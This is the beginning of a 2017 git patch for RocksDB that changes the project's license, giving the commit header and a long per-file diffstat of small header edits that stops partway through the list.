From 3c327ac2d0fd50bbd82fe1f1af5de909dad769e6 Mon Sep 17 00:00:00 2001
From: Siying Dong
Date: Sat, 15 Jul 2017 16:03:42 -0700
Subject: [PATCH 001/205] Change RocksDB License

Summary: Closes https://github.com/facebook/rocksdb/pull/2589

Differential Revision: D5431502

Pulled By: siying

fbshipit-source-id: 8ebf8c87883daa9daa54b2303d11ce01ab1f6f75
---
 LICENSE | 35 ---
 LICENSE.Apache | 202 ++++++++++++++++++
 PATENTS | 33 ---
 build_tools/error_filter.py | 8 +-
 cache/cache_bench.cc | 8 +-
 cache/cache_test.cc | 8 +-
 cache/clock_cache.cc | 8 +-
 cache/clock_cache.h | 6 +-
 cache/lru_cache.cc | 8 +-
 cache/lru_cache.h | 8 +-
 cache/lru_cache_test.cc | 8 +-
 cache/sharded_cache.cc | 8 +-
 cache/sharded_cache.h | 8 +-
 db/builder.cc | 8 +-
 db/builder.h | 8 +-
 db/c.cc | 8 +-
 db/column_family.cc | 8 +-
 db/column_family.h | 8 +-
 db/column_family_test.cc | 7 +-
 db/compact_files_test.cc | 8 +-
 db/compacted_db_impl.cc | 8 +-
 db/compacted_db_impl.h | 8 +-
 db/compaction.cc | 8 +-
 db/compaction.h | 8 +-
 db/compaction_iteration_stats.h | 8 +-
 db/compaction_iterator.cc | 8 +-
 db/compaction_iterator.h | 8 +-
 db/compaction_iterator_test.cc | 8 +-
 db/compaction_job.cc | 8 +-
 db/compaction_job.h | 8 +-
 db/compaction_job_stats_test.cc | 8 +-
 db/compaction_job_test.cc | 8 +-
 db/compaction_picker.cc | 8 +-
 db/compaction_picker.h | 8 +-
 db/compaction_picker_test.cc | 8 +-
 db/compaction_picker_universal.cc | 8 +-
 db/compaction_picker_universal.h | 8 +-
 db/comparator_db_test.cc | 8 +-
 db/convenience.cc | 8 +-
 db/corruption_test.cc | 8 +-
 db/cuckoo_table_db_test.cc | 8 +-
 db/db_basic_test.cc | 8 +-
 db/db_block_cache_test.cc | 8 +-
 db/db_bloom_filter_test.cc | 8 +-
 db/db_compaction_filter_test.cc | 8 +-
 db/db_compaction_test.cc | 8 +-
 db/db_dynamic_level_test.cc | 8 +-
 db/db_encryption_test.cc | 8 +-
 db/db_filesnapshot.cc | 8 +-
 db/db_flush_test.cc | 8 +-
 db/db_impl.cc | 8 +-
 db/db_impl.h | 8 +-
 db/db_impl_compaction_flush.cc | 8 +-
 db/db_impl_debug.cc | 8 +-
 db/db_impl_experimental.cc | 8 +-
 db/db_impl_files.cc | 8 +-
 db/db_impl_open.cc | 8 +-
 db/db_impl_readonly.cc | 8 +-
 db/db_impl_readonly.h | 8 +-
 db/db_impl_write.cc | 8 +-
 db/db_info_dumper.cc | 8 +-
 db/db_info_dumper.h | 8 +-
 db/db_inplace_update_test.cc | 8 +-
 db/db_io_failure_test.cc | 8 +-
 db/db_iter.cc | 8 +-
 db/db_iter.h | 8 +-
 db/db_iter_test.cc | 8 +-
 db/db_iterator_test.cc | 8 +-
 db/db_log_iter_test.cc | 8 +-
 db/db_memtable_test.cc | 8 +-
 db/db_merge_operator_test.cc | 8 +-
 db/db_options_test.cc | 8 +-
 db/db_properties_test.cc | 6 +-
 db/db_range_del_test.cc | 8 +-
 db/db_sst_test.cc | 8 +-
 db/db_statistics_test.cc | 8 +-
 db/db_table_properties_test.cc | 8 +-
 db/db_tailing_iter_test.cc | 8 +-
 db/db_test.cc | 8 +-
 db/db_test2.cc | 8 +-
 db/db_test_util.cc | 6 +-
 db/db_test_util.h | 6 +-
 db/db_universal_compaction_test.cc | 8 +-
 db/db_wal_test.cc | 8 +-
 db/db_write_test.cc | 8 +-
 db/dbformat.cc | 8 +-
 db/dbformat.h | 8 +-
 db/dbformat_test.cc | 8 +-
 db/deletefile_test.cc | 8 +-
 db/event_helpers.cc | 8 +-
 db/event_helpers.h | 8 +-
 db/experimental.cc | 8 +-
 db/external_sst_file_basic_test.cc | 8 +-
 db/external_sst_file_ingestion_job.cc | 8 +-
 db/external_sst_file_ingestion_job.h | 8 +-
 db/external_sst_file_test.cc | 8 +-
 db/fault_injection_test.cc | 8 +-
 db/file_indexer.cc | 8 +-
 db/file_indexer.h | 8 +-
 db/file_indexer_test.cc | 8 +-
 db/filename_test.cc | 8 +-
 db/flush_job.cc | 8 +-
 db/flush_job.h | 8 +-
 db/flush_job_test.cc | 8 +-
 db/flush_scheduler.cc | 8 +-
 db/flush_scheduler.h | 8 +-
 db/forward_iterator.cc | 8 +-
 db/forward_iterator.h | 8 +-
 db/forward_iterator_bench.cc | 8 +-
 db/internal_stats.cc | 8 +-
 db/internal_stats.h | 8 +-
 db/job_context.h | 8 +-
 db/listener_test.cc | 8 +-
 db/log_format.h | 8 +-
 db/log_reader.cc | 8 +-
 db/log_reader.h | 8 +-
 db/log_test.cc | 8 +-
 db/log_writer.cc | 8 +-
 db/log_writer.h | 8 +-
 db/malloc_stats.cc | 6 +-
 db/malloc_stats.h | 6 +-
 db/managed_iterator.cc | 8 +-
 db/managed_iterator.h | 8 +-
 db/manual_compaction_test.cc | 8 +-
 db/memtable.cc | 8 +-
 db/memtable.h | 8 +-
 db/memtable_list.cc | 8 +-
 db/memtable_list.h | 8 +-
 db/memtable_list_test.cc | 8 +-
 db/merge_context.h | 8 +-
 db/merge_helper.cc | 8 +-
 db/merge_helper.h | 8 +-
 db/merge_helper_test.cc | 8 +-
 db/merge_operator.cc | 8 +-
 db/merge_test.cc | 8 +-
 db/options_file_test.cc | 8 +-
 db/perf_context_test.cc | 8 +-
 db/pinned_iterators_manager.h | 8 +-
 db/plain_table_db_test.cc | 8 +-
 db/prefix_test.cc | 8 +-
 db/range_del_aggregator.cc | 8 +-
 db/range_del_aggregator.h | 8 +-
 db/range_del_aggregator_test.cc | 8 +-
 db/repair.cc | 8 +-
 db/repair_test.cc | 8 +-
 db/snapshot_impl.cc | 8 +-
 db/snapshot_impl.h | 8 +-
 db/table_cache.cc | 8 +-
 db/table_cache.h | 8 +-
 db/table_properties_collector.cc | 8 +-
 db/table_properties_collector.h | 8 +-
 db/table_properties_collector_test.cc | 8 +-
 db/transaction_log_impl.cc | 8 +-
 db/transaction_log_impl.h | 8 +-
 db/version_builder.cc | 8 +-
 db/version_builder.h | 8 +-
 db/version_builder_test.cc | 8 +-
 db/version_edit.cc | 8 +-
 db/version_edit.h | 8 +-
 db/version_edit_test.cc | 8 +-
 db/version_set.cc | 8 +-
 db/version_set.h | 8 +-
 db/version_set_test.cc | 8 +-
 db/wal_manager.cc | 8 +-
 db/wal_manager.h | 8 +-
 db/wal_manager_test.cc | 8 +-
 db/write_batch.cc | 8 +-
 db/write_batch_base.cc | 8 +-
 db/write_batch_internal.h | 8 +-
 db/write_batch_test.cc | 8 +-
 db/write_callback.h | 6 +-
 db/write_callback_test.cc | 8 +-
 db/write_controller.cc | 8 +-
 db/write_controller.h | 8 +-
 db/write_controller_test.cc | 8 +-
 db/write_thread.cc | 8 +-
 db/write_thread.h | 8 +-
 env/env.cc | 8 +-
 env/env_chroot.cc | 8 +-
 env/env_chroot.h | 8 +-
 env/env_encryption.cc | 8 +-
 env/env_hdfs.cc | 8 +-
 env/env_posix.cc | 8 +-
 env/env_test.cc | 8 +-
 env/io_posix.cc | 8 +-
 env/io_posix.h | 8 +-
 env/mock_env.cc | 8 +-
 env/mock_env.h | 8 +-
 env/posix_logger.h | 8 +-
 examples/c_simple_example.c | 8 +-
 examples/column_families_example.cc | 6 +-
 examples/compact_files_example.cc | 6 +-
 examples/compaction_filter_example.cc | 6 +-
 examples/optimistic_transaction_example.cc | 6 +-
 examples/options_file_example.cc | 6 +-
 examples/simple_example.cc | 6 +-
 examples/transaction_example.cc | 6 +-
 hdfs/env_hdfs.h | 8 +-
 include/rocksdb/advanced_options.h | 6 +-
 include/rocksdb/c.h | 11 +-
 include/rocksdb/cache.h | 6 +-
 include/rocksdb/cleanable.h | 6 +-
 include/rocksdb/compaction_filter.h | 6 +-
 include/rocksdb/compaction_job_stats.h | 6 +-
 include/rocksdb/comparator.h | 6 +-
 include/rocksdb/convenience.h | 6 +-
 include/rocksdb/db.h | 6 +-
 include/rocksdb/db_bench_tool.h | 6 +-
 include/rocksdb/db_dump_tool.h | 8 +-
 include/rocksdb/env.h | 6 +-
 include/rocksdb/env_encryption.h | 8 +-
 include/rocksdb/experimental.h | 6 +-
 include/rocksdb/filter_policy.h | 6 +-
 include/rocksdb/flush_block_policy.h | 6 +-
 include/rocksdb/iostats_context.h | 6 +-
 include/rocksdb/iterator.h | 6 +-
 include/rocksdb/ldb_tool.h | 6 +-
 include/rocksdb/memtablerep.h | 6 +-
 include/rocksdb/merge_operator.h | 6 +-
 include/rocksdb/metadata.h | 6 +-
 include/rocksdb/options.h | 6 +-
 include/rocksdb/perf_context.h | 6 +-
 include/rocksdb/perf_level.h | 6 +-
 include/rocksdb/persistent_cache.h | 6 +-
 include/rocksdb/rate_limiter.h | 8 +-
 include/rocksdb/slice.h | 6 +-
 include/rocksdb/slice_transform.h | 6 +-
 include/rocksdb/snapshot.h | 8 +-
 include/rocksdb/sst_dump_tool.h | 6 +-
 include/rocksdb/sst_file_manager.h | 8 +-
 include/rocksdb/sst_file_writer.h | 8 +-
 include/rocksdb/statistics.h | 6 +-
 include/rocksdb/status.h | 6 +-
 include/rocksdb/thread_status.h | 6 +-
 include/rocksdb/threadpool.h | 8 +-
 include/rocksdb/transaction_log.h | 6 +-
 include/rocksdb/types.h | 6 +-
 include/rocksdb/universal_compaction.h | 6 +-
 include/rocksdb/utilities/backupable_db.h | 8 +-
 include/rocksdb/utilities/checkpoint.h | 6 +-
 include/rocksdb/utilities/convenience.h | 6 +-
 include/rocksdb/utilities/date_tiered_db.h | 8 +-
 include/rocksdb/utilities/db_ttl.h | 8 +-
 include/rocksdb/utilities/debug.h | 6 +-
 include/rocksdb/utilities/document_db.h | 8 +-
 include/rocksdb/utilities/env_librados.h | 6 +-
 include/rocksdb/utilities/env_mirror.h | 6 +-
 include/rocksdb/utilities/geo_db.h | 8 +-
 include/rocksdb/utilities/info_log_finder.h | 6 +-
 include/rocksdb/utilities/json_document.h | 8 +-
 include/rocksdb/utilities/ldb_cmd.h | 8 +-
 .../utilities/ldb_cmd_execute_result.h | 8 +-
 include/rocksdb/utilities/leveldb_options.h | 8 +-
 .../lua/rocks_lua_compaction_filter.h | 8 +-
 .../utilities/lua/rocks_lua_custom_library.h | 8 +-
 .../rocksdb/utilities/lua/rocks_lua_util.h | 8 +-
 include/rocksdb/utilities/memory_util.h | 6 +-
 include/rocksdb/utilities/object_registry.h | 6 +-
 .../utilities/optimistic_transaction_db.h | 8 +-
 .../utilities/option_change_migration.h | 8 +-
 include/rocksdb/utilities/options_util.h | 6 +-
 include/rocksdb/utilities/sim_cache.h | 6 +-
 include/rocksdb/utilities/spatial_db.h | 8 +-
 .../utilities/table_properties_collectors.h | 8 +-
 include/rocksdb/utilities/transaction.h | 6 +-
 include/rocksdb/utilities/transaction_db.h | 8 +-
 .../rocksdb/utilities/transaction_db_mutex.h | 8 +-
 .../utilities/write_batch_with_index.h | 6 +-
 include/rocksdb/version.h | 6 +-
 include/rocksdb/wal_filter.h | 6 +-
 include/rocksdb/write_batch.h | 6 +-
 include/rocksdb/write_batch_base.h | 6 +-
 include/rocksdb/write_buffer_manager.h | 8 +-
 .../org/rocksdb/benchmark/DbBenchmark.java | 6 +-
 java/rocksjni/backupablejni.cc | 6 +-
 java/rocksjni/backupenginejni.cc | 6 +-
 java/rocksjni/cassandra_value_operator.cc | 6 +-
 java/rocksjni/checkpoint.cc | 6 +-
 java/rocksjni/clock_cache.cc | 6 +-
 java/rocksjni/columnfamilyhandle.cc | 6 +-
 java/rocksjni/compaction_filter.cc | 6 +-
 java/rocksjni/compaction_options_fifo.cc | 6 +-
 java/rocksjni/compaction_options_universal.cc | 6 +-
 java/rocksjni/comparator.cc | 6 +-
 java/rocksjni/comparatorjnicallback.cc | 6 +-
 java/rocksjni/comparatorjnicallback.h | 6 +-
 java/rocksjni/compression_options.cc | 6 +-
 java/rocksjni/env.cc | 6 +-
 java/rocksjni/env_options.cc | 6 +-
 java/rocksjni/filter.cc | 6 +-
 java/rocksjni/ingest_external_file_options.cc | 6 +-
 java/rocksjni/iterator.cc | 6 +-
 java/rocksjni/loggerjnicallback.cc | 6 +-
 java/rocksjni/loggerjnicallback.h | 6 +-
 java/rocksjni/lru_cache.cc | 6 +-
 java/rocksjni/memtablejni.cc | 6 +-
 java/rocksjni/merge_operator.cc | 6 +-
 java/rocksjni/options.cc | 6 +-
 java/rocksjni/portal.h | 6 +-
 java/rocksjni/ratelimiterjni.cc | 6 +-
 .../remove_emptyvalue_compactionfilterjni.cc | 6 +-
 java/rocksjni/restorejni.cc | 6 +-
 java/rocksjni/rocksdb_exception_test.cc | 6 +-
 java/rocksjni/rocksjni.cc | 6 +-
 java/rocksjni/slice.cc | 6 +-
 java/rocksjni/snapshot.cc | 6 +-
 java/rocksjni/sst_file_writerjni.cc | 6 +-
 java/rocksjni/statistics.cc | 6 +-
 java/rocksjni/statisticsjni.cc | 6 +-
 java/rocksjni/statisticsjni.h | 6 +-
 java/rocksjni/table.cc | 6 +-
 java/rocksjni/transaction_log.cc | 6 +-
 java/rocksjni/ttl.cc | 6 +-
 java/rocksjni/write_batch.cc | 6 +-
 java/rocksjni/write_batch_test.cc | 6 +-
 java/rocksjni/write_batch_with_index.cc | 6 +-
 java/rocksjni/writebatchhandlerjnicallback.cc | 6 +-
 java/rocksjni/writebatchhandlerjnicallback.h | 6 +-
 .../main/java/RocksDBColumnFamilySample.java | 6 +-
 java/samples/src/main/java/RocksDBSample.java | 6 +-
 .../org/rocksdb/AbstractCompactionFilter.java | 6 +-
 .../java/org/rocksdb/AbstractComparator.java | 6 +-
 .../AbstractImmutableNativeReference.java | 6 +-
 .../org/rocksdb/AbstractNativeReference.java | 6 +-
 .../org/rocksdb/AbstractRocksIterator.java | 6 +-
 .../main/java/org/rocksdb/AbstractSlice.java | 6 +-
 .../java/org/rocksdb/AbstractWriteBatch.java | 6 +-
 .../src/main/java/org/rocksdb/AccessHint.java | 6 +-
 .../AdvancedColumnFamilyOptionsInterface.java | 6 +-
 ...edMutableColumnFamilyOptionsInterface.java | 6 +-
 .../main/java/org/rocksdb/BackupEngine.java | 6 +-
 .../src/main/java/org/rocksdb/BackupInfo.java | 6 +-
 .../java/org/rocksdb/BackupableDBOptions.java | 6 +-
 .../org/rocksdb/BlockBasedTableConfig.java | 6 +-
 .../main/java/org/rocksdb/BloomFilter.java | 6 +-
 .../java/org/rocksdb/BuiltinComparator.java | 6 +-
 java/src/main/java/org/rocksdb/Cache.java | 6 +-
 .../rocksdb/CassandraValueMergeOperator.java | 6 +-
 .../src/main/java/org/rocksdb/Checkpoint.java | 6 +-
 .../main/java/org/rocksdb/ChecksumType.java | 6 +-
 .../src/main/java/org/rocksdb/ClockCache.java | 6 +-
 .../org/rocksdb/ColumnFamilyDescriptor.java | 6 +-
 .../java/org/rocksdb/ColumnFamilyHandle.java | 6 +-
 .../java/org/rocksdb/ColumnFamilyOptions.java | 6 +-
 .../rocksdb/ColumnFamilyOptionsInterface.java | 6 +-
 .../org/rocksdb/CompactionOptionsFIFO.java | 6 +-
 .../rocksdb/CompactionOptionsUniversal.java | 6 +-
 .../java/org/rocksdb/CompactionPriority.java | 6 +-
 .../java/org/rocksdb/CompactionStyle.java | 6 +-
 .../src/main/java/org/rocksdb/Comparator.java | 6 +-
 .../java/org/rocksdb/CompressionOptions.java | 6 +-
 .../java/org/rocksdb/CompressionType.java | 6 +-
 java/src/main/java/org/rocksdb/DBOptions.java | 6 +-
 .../java/org/rocksdb/DBOptionsInterface.java | 6 +-
 java/src/main/java/org/rocksdb/DbPath.java | 6 +-
 .../java/org/rocksdb/DirectComparator.java | 6 +-
 .../main/java/org/rocksdb/DirectSlice.java | 6 +-
 .../main/java/org/rocksdb/EncodingType.java | 6 +-
 java/src/main/java/org/rocksdb/Env.java | 6 +-
 .../src/main/java/org/rocksdb/EnvOptions.java | 6 +-
 .../main/java/org/rocksdb/Experimental.java | 6 +-
 java/src/main/java/org/rocksdb/Filter.java | 6 +-
 .../main/java/org/rocksdb/HistogramData.java | 6 +-
 .../main/java/org/rocksdb/HistogramType.java | 6 +-
 java/src/main/java/org/rocksdb/IndexType.java | 6 +-
 .../rocksdb/IngestExternalFileOptions.java | 6 +-
 java/src/main/java/org/rocksdb/LRUCache.java | 6 +-
 java/src/main/java/org/rocksdb/Logger.java | 6 +-
 .../main/java/org/rocksdb/MemTableConfig.java | 6 +-
 .../main/java/org/rocksdb/MergeOperator.java | 6 +-
 .../rocksdb/MutableColumnFamilyOptions.java | 6 +-
 .../MutableColumnFamilyOptionsInterface.java | 6 +-
 java/src/main/java/org/rocksdb/Options.java | 6 +-
 .../java/org/rocksdb/PlainTableConfig.java | 6 +-
 .../main/java/org/rocksdb/RateLimiter.java | 6 +-
 .../main/java/org/rocksdb/ReadOptions.java | 6 +-
 java/src/main/java/org/rocksdb/ReadTier.java | 6 +-
 .../RemoveEmptyValueCompactionFilter.java | 6 +-
 .../main/java/org/rocksdb/RestoreOptions.java | 6 +-
 java/src/main/java/org/rocksdb/RocksDB.java | 6 +-
 .../java/org/rocksdb/RocksDBException.java | 6 +-
 java/src/main/java/org/rocksdb/RocksEnv.java | 6 +-
 .../main/java/org/rocksdb/RocksIterator.java | 6 +-
 .../org/rocksdb/RocksIteratorInterface.java | 6 +-
 .../main/java/org/rocksdb/RocksMemEnv.java | 6 +-
 .../java/org/rocksdb/RocksMutableObject.java | 6 +-
 .../main/java/org/rocksdb/RocksObject.java | 6 +-
 java/src/main/java/org/rocksdb/Slice.java | 6 +-
 java/src/main/java/org/rocksdb/Snapshot.java | 6 +-
 .../main/java/org/rocksdb/SstFileWriter.java | 6 +-
 .../src/main/java/org/rocksdb/Statistics.java | 6 +-
 .../java/org/rocksdb/StatisticsCollector.java | 6 +-
 .../rocksdb/StatisticsCollectorCallback.java | 6 +-
 .../java/org/rocksdb/StatsCollectorInput.java | 6 +-
 .../src/main/java/org/rocksdb/StatsLevel.java | 6 +-
 java/src/main/java/org/rocksdb/Status.java | 6 +-
 .../org/rocksdb/StringAppendOperator.java | 6 +-
 .../java/org/rocksdb/TableFormatConfig.java | 6 +-
 .../src/main/java/org/rocksdb/TickerType.java | 6 +-
 java/src/main/java/org/rocksdb/TtlDB.java | 6 +-
 .../java/org/rocksdb/WALRecoveryMode.java | 6 +-
 .../java/org/rocksdb/WBWIRocksIterator.java | 6 +-
 .../src/main/java/org/rocksdb/WriteBatch.java | 6 +-
 .../java/org/rocksdb/WriteBatchInterface.java | 6 +-
 .../java/org/rocksdb/WriteBatchWithIndex.java | 6 +-
 .../main/java/org/rocksdb/WriteOptions.java | 6 +-
 .../org/rocksdb/util/BytewiseComparator.java | 6 +-
 .../util/DirectBytewiseComparator.java | 6 +-
 .../util/ReverseBytewiseComparator.java | 6 +-
 .../main/java/org/rocksdb/util/SizeUnit.java | 6 +-
 .../org/rocksdb/AbstractComparatorTest.java | 6 +-
 .../java/org/rocksdb/BackupEngineTest.java | 6 +-
 .../org/rocksdb/BackupableDBOptionsTest.java | 6 +-
 .../rocksdb/BlockBasedTableConfigTest.java | 6 +-
 .../test/java/org/rocksdb/ClockCacheTest.java | 6 +-
 .../org/rocksdb/ColumnFamilyOptionsTest.java | 6 +-
 .../java/org/rocksdb/ColumnFamilyTest.java | 6 +-
 .../rocksdb/CompactionOptionsFIFOTest.java | 6 +-
 .../CompactionOptionsUniversalTest.java | 6 +-
 .../org/rocksdb/CompactionPriorityTest.java | 6 +-
 .../org/rocksdb/CompactionStopStyleTest.java | 6 +-
 .../org/rocksdb/ComparatorOptionsTest.java | 6 +-
 .../test/java/org/rocksdb/ComparatorTest.java | 6 +-
 .../org/rocksdb/CompressionOptionsTest.java | 6 +-
 .../org/rocksdb/CompressionTypesTest.java | 6 +-
 .../test/java/org/rocksdb/DBOptionsTest.java | 6 +-
 .../org/rocksdb/DirectComparatorTest.java | 6 +-
 .../java/org/rocksdb/DirectSliceTest.java | 6 +-
 .../test/java/org/rocksdb/EnvOptionsTest.java | 6 +-
 .../src/test/java/org/rocksdb/FilterTest.java | 6 +-
 java/src/test/java/org/rocksdb/FlushTest.java | 6 +-
 .../IngestExternalFileOptionsTest.java | 6 +-
 .../java/org/rocksdb/KeyMayExistTest.java | 6 +-
 .../test/java/org/rocksdb/LRUCacheTest.java | 6 +-
 .../test/java/org/rocksdb/MemTableTest.java | 6 +-
 java/src/test/java/org/rocksdb/MergeTest.java | 6 +-
 .../java/org/rocksdb/MixedOptionsTest.java | 6 +-
 .../MutableColumnFamilyOptionsTest.java | 6 +-
 .../org/rocksdb/NativeLibraryLoaderTest.java | 6 +-
 .../test/java/org/rocksdb/OptionsTest.java | 6 +-
 .../org/rocksdb/PlainTableConfigTest.java | 6 +-
 .../org/rocksdb/PlatformRandomHelper.java | 6 +-
 .../java/org/rocksdb/RateLimiterTest.java | 6 +-
 .../test/java/org/rocksdb/ReadOnlyTest.java | 6 +-
 .../java/org/rocksdb/ReadOptionsTest.java | 6 +-
 .../org/rocksdb/RocksDBExceptionTest.java | 6 +-
 .../test/java/org/rocksdb/RocksDBTest.java | 6 +-
 .../test/java/org/rocksdb/RocksEnvTest.java | 6 +-
 .../java/org/rocksdb/RocksIteratorTest.java | 6 +-
 .../java/org/rocksdb/RocksMemEnvTest.java | 6 +-
 java/src/test/java/org/rocksdb/SliceTest.java | 6 +-
 .../test/java/org/rocksdb/SnapshotTest.java | 6 +-
 .../java/org/rocksdb/SstFileWriterTest.java | 6 +-
 .../org/rocksdb/StatisticsCollectorTest.java | 6 +-
 .../test/java/org/rocksdb/StatisticsTest.java | 6 +-
 .../java/org/rocksdb/StatsCallbackMock.java | 6 +-
 java/src/test/java/org/rocksdb/TtlDBTest.java | 6 +-
 java/src/test/java/org/rocksdb/Types.java | 6 +-
 .../java/org/rocksdb/WALRecoveryModeTest.java | 6 +-
 .../org/rocksdb/WriteBatchHandlerTest.java | 6 +-
 .../test/java/org/rocksdb/WriteBatchTest.java | 6 +-
 .../org/rocksdb/WriteBatchThreadedTest.java | 6 +-
 .../org/rocksdb/WriteBatchWithIndexTest.java | 6 +-
 .../java/org/rocksdb/WriteOptionsTest.java | 6 +-
 .../org/rocksdb/test/RocksJunitRunner.java | 6 +-
 .../rocksdb/util/BytewiseComparatorTest.java | 6 +-
 .../org/rocksdb/util/EnvironmentTest.java | 6 +-
 .../java/org/rocksdb/util/SizeUnitTest.java | 6 +-
 memtable/alloc_tracker.cc | 8 +-
 memtable/hash_cuckoo_rep.cc | 8 +-
 memtable/hash_cuckoo_rep.h | 6 +-
 memtable/hash_linklist_rep.cc | 8 +-
 memtable/hash_linklist_rep.h | 6 +-
 memtable/hash_skiplist_rep.cc | 8 +-
 memtable/hash_skiplist_rep.h | 6 +-
 memtable/inlineskiplist.h | 7 +-
 memtable/inlineskiplist_test.cc | 8 +-
 memtable/memtablerep_bench.cc | 8 +-
 memtable/skiplist.h | 8 +-
 memtable/skiplist_test.cc | 8 +-
 memtable/skiplistrep.cc | 8 +-
 memtable/stl_wrappers.h | 8 +-
 memtable/vectorrep.cc | 8 +-
 memtable/write_buffer_manager.cc | 8 +-
 memtable/write_buffer_manager_test.cc | 8 +-
 monitoring/file_read_sample.h | 8 +-
 monitoring/histogram.cc | 8 +-
 monitoring/histogram.h | 8 +-
 monitoring/histogram_test.cc | 8 +-
 monitoring/histogram_windowing.cc | 8 +-
 monitoring/histogram_windowing.h | 8 +-
 monitoring/instrumented_mutex.cc | 8 +-
 monitoring/instrumented_mutex.h | 8 +-
 monitoring/iostats_context.cc | 6 +-
 monitoring/iostats_context_imp.h | 8 +-
 monitoring/iostats_context_test.cc | 6 +-
 monitoring/perf_context.cc | 8 +-
 monitoring/perf_context_imp.h | 8 +-
 monitoring/perf_level.cc | 8 +-
 monitoring/perf_level_imp.h | 8 +-
 monitoring/perf_step_timer.h | 8 +-
 monitoring/statistics.cc | 8 +-
 monitoring/statistics.h | 8 +-
 monitoring/statistics_test.cc | 8 +-
 monitoring/thread_status_impl.cc | 6 +-
 monitoring/thread_status_updater.cc | 6 +-
 monitoring/thread_status_updater.h | 6 +-
 monitoring/thread_status_updater_debug.cc | 6 +-
 monitoring/thread_status_util.cc | 6 +-
 monitoring/thread_status_util.h | 6 +-
 monitoring/thread_status_util_debug.cc | 6 +-
 options/cf_options.cc | 8 +-
 options/cf_options.h | 6 +-
 options/db_options.cc | 6 +-
 options/db_options.h | 6 +-
 options/options.cc | 8 +-
 options/options_helper.cc | 8 +-
 options/options_helper.h | 6 +-
 options/options_parser.cc | 6 +-
 options/options_parser.h | 6 +-
 options/options_sanity_check.cc | 6 +-
 options/options_sanity_check.h | 6 +-
 options/options_settable_test.cc | 8 +-
 options/options_test.cc | 8 +-
 port/dirent.h | 8 +-
 port/likely.h | 8 +-
 port/port.h | 8 +-
 port/port_example.h | 8 +-
 port/port_posix.cc | 8 +-
 port/port_posix.h | 8 +-
 port/stack_trace.cc | 8 +-
 port/stack_trace.h | 8 +-
 port/sys_time.h | 8 +-
 port/util_logger.h | 8 +-
 port/win/env_default.cc | 8 +-
 port/win/env_win.cc | 8 +-
 port/win/env_win.h | 6 +-
 port/win/io_win.cc | 8 +-
 port/win/io_win.h | 8 +-
 port/win/port_win.cc | 8 +-
 port/win/port_win.h | 8 +-
 port/win/win_logger.cc | 8 +-
 port/win/win_logger.h | 8 +-
 port/win/win_thread.cc | 8 +-
 port/win/win_thread.h | 8 +-
 port/win/xpress_win.cc | 8 +-
 port/win/xpress_win.h | 8 +-
 port/xpress.h | 8 +-
 table/block.cc | 8 +-
 table/block.h | 8 +-
 table/block_based_filter_block.cc | 8 +-
 table/block_based_filter_block.h | 8 +-
 table/block_based_filter_block_test.cc | 8 +-
 table/block_based_table_builder.cc | 8 +-
 table/block_based_table_builder.h | 8 +-
 table/block_based_table_factory.cc | 8 +-
 table/block_based_table_factory.h | 8 +-
 table/block_based_table_reader.cc | 8 +-
 table/block_based_table_reader.h | 8 +-
 table/block_builder.cc | 8 +-
 table/block_builder.h | 8 +-
 table/block_prefix_index.cc | 6 +-
 table/block_prefix_index.h | 6 +-
 table/block_test.cc | 8 +-
 table/bloom_block.cc | 8 +-
 table/bloom_block.h | 8 +-
 table/cleanable_test.cc | 8 +-
 table/cuckoo_table_builder.cc | 8 +-
 table/cuckoo_table_builder.h | 8 +-
 table/cuckoo_table_builder_test.cc | 6 +-
 table/cuckoo_table_factory.cc | 6 +-
 table/cuckoo_table_factory.h | 6 +-
 table/cuckoo_table_reader.cc | 8 +-
 table/cuckoo_table_reader.h | 8 +-
 table/cuckoo_table_reader_test.cc | 6 +-
 table/filter_block.h | 8 +-
 table/flush_block_policy.cc | 8 +-
 table/format.cc | 8 +-
 table/format.h | 8 +-
 table/full_filter_bits_builder.h | 6 +-
 table/full_filter_block.cc | 8 +-
 table/full_filter_block.h | 8 +-
 table/full_filter_block_test.cc | 8 +-
 table/get_context.cc | 8 +-
 table/get_context.h | 8 +-
 table/index_builder.cc | 8 +-
 table/index_builder.h | 8 +-
 table/internal_iterator.h | 6 +-
 table/iter_heap.h | 8 +-
 table/iterator.cc | 8 +-
 table/iterator_wrapper.h | 8 +-
 table/merger_test.cc | 8 +-
 table/merging_iterator.cc | 8 +-
 table/merging_iterator.h | 8 +-
 table/meta_blocks.cc | 8 +-
 table/meta_blocks.h | 8 +-
 table/mock_table.cc | 8 +-
 table/mock_table.h | 8 +-
 table/partitioned_filter_block.cc | 8 +-
 table/partitioned_filter_block.h | 8 +-
 table/partitioned_filter_block_test.cc | 8 +-
 table/persistent_cache_helper.cc | 8 +-
 table/persistent_cache_helper.h | 8 +-
 table/persistent_cache_options.h | 8 +-
 table/plain_table_builder.cc | 8 +-
 table/plain_table_builder.h | 8 +-
 table/plain_table_index.cc | 8 +-
 table/plain_table_index.h | 8 +-
 table/plain_table_key_coding.cc | 8 +-
 table/plain_table_key_coding.h | 8 +-
 table/scoped_arena_iterator.h | 6 +-
 table/sst_file_writer.cc | 8 +-
 table/sst_file_writer_collectors.h | 8 +-
 table/table_builder.h | 8 +-
 table/table_properties.cc | 8 +-
 table/table_properties_internal.h | 8 +-
 table/table_reader.h | 8 +-
 table/table_reader_bench.cc | 8 +-
 table/table_test.cc | 8 +-
 table/two_level_iterator.cc | 8 +-
 table/two_level_iterator.h | 8 +-
 third-party/fbson/FbsonDocument.h | 13 +-
 third-party/fbson/FbsonJsonParser.h | 13 +-
 third-party/fbson/FbsonStream.h | 13 +-
 third-party/fbson/FbsonUtil.h | 13 +-
 third-party/fbson/FbsonWriter.h | 13 +-
 tools/blob_dump.cc | 8 +-
 tools/db_bench.cc | 8 +-
 tools/db_bench_tool.cc | 8 +-
 tools/db_bench_tool_test.cc | 8 +-
 tools/db_repl_stress.cc | 8 +-
 tools/db_sanity_test.cc | 8 +-
 tools/db_stress.cc | 8 +-
 tools/dump/db_dump_tool.cc | 8 +-
 tools/dump/rocksdb_dump.cc | 8 +-
 tools/dump/rocksdb_undump.cc | 8 +-
 tools/ldb.cc | 8 +-
 tools/ldb_cmd.cc | 8 +-
 tools/ldb_cmd_impl.h | 8 +-
 tools/ldb_cmd_test.cc | 8 +-
 tools/ldb_tool.cc | 8 +-
 tools/reduce_levels_test.cc | 8 +-
 tools/sst_dump.cc | 8 +-
 tools/sst_dump_test.cc | 8 +-
 tools/sst_dump_tool.cc | 8 +-
 tools/sst_dump_tool_imp.h | 6 +-
 tools/write_stress.cc | 6 +-
 util/aligned_buffer.h | 8 +-
 util/allocator.h | 8 +-
 util/arena.cc | 8 +-
